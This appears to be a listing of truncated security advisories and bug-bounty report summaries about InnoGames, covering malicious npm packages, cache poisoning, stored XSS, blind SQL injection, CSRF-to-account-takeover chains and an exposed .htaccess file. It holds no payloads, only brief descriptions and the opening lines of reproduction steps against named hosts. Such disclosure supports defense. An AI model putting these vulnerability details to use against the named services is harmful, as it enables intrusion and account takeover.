MAL-2025-23239 Malicious code in innogames (npm)

The package innogames was found to contain malicious code...

MAL-2022-2040 Malicious code in com.innogames.asset-relations-viewer-addressables (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 81ae03950b09c854e3888fb0f69bec9fab0b81bd98f06e7c522bff8dda778b03 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

InnoGames: Cache Poisoning via uppercase letters in invalid path

Summary of the issue Cache poisoning vulnerability appears in the request to innogames.com. The issue arises when language path parameter from the url gets processed on the backend to become lowercase. Then if a path provided in X-Forwarded-Host does not exist on the server, 301 response is...

InnoGames: Stored XSS on recruit.innogames.de

Summary: When applying for a Supporter/Moderator job at recruit.innogames.de the drop-down field "Position" is vulnerable to a stored XSS as the content is not validated. Description: Steps To Reproduce: 1. Visit https://recruit.innogames.de/staemme/de/index/page/show/apply 2. Fill out all requir...

InnoGames: Impersonation and ticket id enumeration on support.innogames.com

A missing check for authorization made it possible to answer tickets owned by other users in their own name...

InnoGames: Create any military unit in any age

Summary of the Issue It's possible to create a sniperbot unit in the bronze age by sending a crafted request to xs1.forgeofempires.com/game/json endpoint Steps to reproduce 1 Login to https://xs1.forgeofempires.com with Chrome browser while observing network tab. 2 Open the poc20200227.html F7304...

InnoGames: Blind SQL Injection

Summary of the Issue A Time Based Blind SQL injection vulnerability was detected on www.innogames.com. Using a specifically crafted payload it was possible to extract database entries. Vulnerable endpoint: https://www.innogames.com/ Steps to reproduce: 1. Getting two states for boolean based sql...

InnoGames: Chaining Bugs: Leakage of CSRF token which leads to Stored XSS and Account Takeover (xs1.tribalwars.cash)

The referrer leaked the CSRF code, when opening an embedded PHP file set by the images function in tribe forums. Due to a premium function, which allows players to store and run Javascript scripts during the game, the session ID could be grabbed, as it was mistakenly embedded into the DOM. This...

InnoGames: Information disclosure via ".htaccess" at https://login.innogames.de

Hi team , i found insecure file Name: htaccess Normally, only the web server is allowed to read the .htaccess file, but in this case, it appears that there is a misconfiguration that is causing the contents of the .htaccess located at https://login.innogames.de/.htaccess to download file and read...